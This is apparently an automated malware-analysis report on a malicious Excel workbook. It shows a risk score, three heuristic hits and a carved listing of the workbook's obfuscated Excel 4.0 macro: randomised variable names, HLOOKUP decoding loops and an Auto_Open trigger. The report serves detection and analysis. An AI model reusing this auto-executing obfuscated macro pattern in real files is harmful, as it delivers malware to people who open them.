MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6649 bytes |
SHA-256: 9724ece1b3a54b281d71097971912e00ef70820aa2c4735234dab57bb16e2f7c |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - jNHFvs
' 0018 22 LABEL : Cell Value, String Constant - ahLcEXV len=0
' 0018 23 LABEL : Cell Value, String Constant - AsdUPPam len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!D166
' 0018 27 LABEL : Cell Value, String Constant - bqPXIcIngmFr len=0
' 0018 24 LABEL : Cell Value, String Constant - caQraVGBk len=0
' 0018 25 LABEL : Cell Value, String Constant - emJHBQlsmn len=0
' 0018 20 LABEL : Cell Value, String Constant - eoiYc len=0
' 0018 22 LABEL : Cell Value, String Constant - gDNAlFm len=0
' 0018 20 LABEL : Cell Value, String Constant - GHyei len=0
' 0018 21 LABEL : Cell Value, String Constant - GXxfmf len=0
' 0018 26 LABEL : Cell Value, String Constant - LcxptaYhuEH len=0
' 0018 24 LABEL : Cell Value, String Constant - lMJIjVrCP len=0
' 0018 20 LABEL : Cell Value, String Constant - mSams len=0
' 0018 27 LABEL : Cell Value, String Constant - PXhNyOfUJEBY len=0
' 0018 21 LABEL : Cell Value, String Constant - rQmbgr len=0
' 0018 27 LABEL : Cell Value, String Constant - SMjPJtIYAYRe len=0
' 0018 21 LABEL : Cell Value, String Constant - uAyPqh len=0
' 0018 21 LABEL : Cell Value, String Constant - VNWTJb len=0
' 0018 25 LABEL : Cell Value, String Constant - WeCfSEVERr len=0
' 0018 24 LABEL : Cell Value, String Constant - ylSoQjknW len=0
' 0018 21 LABEL : Cell Value, String Constant - YRUgWx len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' jNHFvs,D84,"SET.NAME("caQraVGBk",0+VALUE("0"))",""
' jNHFvs,D86,"SET.NAME("emJHBQlsmn",caQraVGBk)",""
' jNHFvs,D88,"SET.NAME("eoiYc",caQraVGBk)",""
' jNHFvs,D90,"SET.NAME("LcxptaYhuEH",COUNTA(gDNAlFm))",""
' jNHFvs,D93,"SET.NAME("VNWTJb",COUNTA(WeCfSEVERr))",""
' jNHFvs,P94,"",-615.00000000000000000000
' jNHFvs,P95,"",239.00000000000000000000
' jNHFvs,P96,"",-377.00000000000000000000
' jNHFvs,D97,[],""
' jNHFvs,P97,"",383.00000000000000000000
' jNHFvs,P98,"",707.00000000000000000000
' jNHFvs,D99,"SET.NAME("ylSoQjknW","")",""
' jNHFvs,P99,"",-908.00000000000000000000
' jNHFvs,D101,"emJHBQlsmn",""
' jNHFvs,D106,"SET.NAME("AsdUPPam",HLOOKUP("*",gDNAlFm,emJHBQlsmn,FALSE))",""
' jNHFvs,D108,"rQmbgr",""
' jNHFvs,D113,"SET.NAME("mSams",caQraVGBk)",""
' jNHFvs,D115,[],""
' jNHFvs,D120,"mSams",""
' jNHFvs,D122,"GHyei",""
' jNHFvs,D127,"YRUgWx",""
' jNHFvs,D132,"GXxfmf",""
' jNHFvs,D134,"SET.NAME("bqPXIcIngmFr",VALUE(HLOOKUP("*",WeCfSEVERr,GXxfmf,FALSE)))",""
' jNHFvs,D137,"PXhNyOfUJEBY",""
' jNHFvs,D141,"ylSoQjknW",""
' jNHFvs,D146,"eoiYc",""
' jNHFvs,D149,NEXT(),""
' jNHFvs,D152,"uAyPqh",""
' jNHFvs,D157,[],""
' jNHFvs,D159,"lMJIjVrCP",""
' jNHFvs,D161,NEXT(),""
' jNHFvs,D164,RETURN(),""
' jNHFvs,D190,"SET.NAME("ahLcEXV",D84)",""
' jNHFvs,D192,"gDNAlFm",""
' jNHFvs,D195,"SET.NAME("WeCfSEVERr",R46C11)",""
' jNHFvs,D197,"SET.NAME("lMJIjVrCP",203)",""
' jNHFvs,D199,"SET.NAME("SMjPJtIYAYRe",4)",""
' jNHFvs,D202,ahLcEXV(),""
' jNHFvs,D203,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.